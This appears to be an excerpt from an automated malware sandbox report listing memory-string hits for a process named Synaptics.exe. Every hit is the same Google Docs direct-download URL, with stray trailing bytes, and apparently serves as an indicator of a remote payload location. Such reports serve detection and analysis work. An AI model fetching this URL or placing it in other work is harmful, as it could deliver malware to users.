                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0a
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0d
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0j
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1/L.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1SO
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1n
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2PB
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2ls-
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2m
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2o
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lssI
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4.I-%
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4e
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4~
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5VK-%
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1828505760.000000000D9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6WN.
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000003.1439557060.000000000538B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7M
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7jv/rN
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7m
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8c
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8j
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9.D-$
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9RG)n
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9Z
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:$L-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:_
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:n
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;WE.;
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;work1ot
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=k
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=ns-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAY
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAk
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBV
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBm
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBsn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC5aEUzj;/iG
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCalif
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCl
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDa
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDj
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadES
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEn
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF%i
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFl
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFo
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGMT
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGT
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH~
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIj
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKP
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKl
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKo
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLb
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLm
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLp
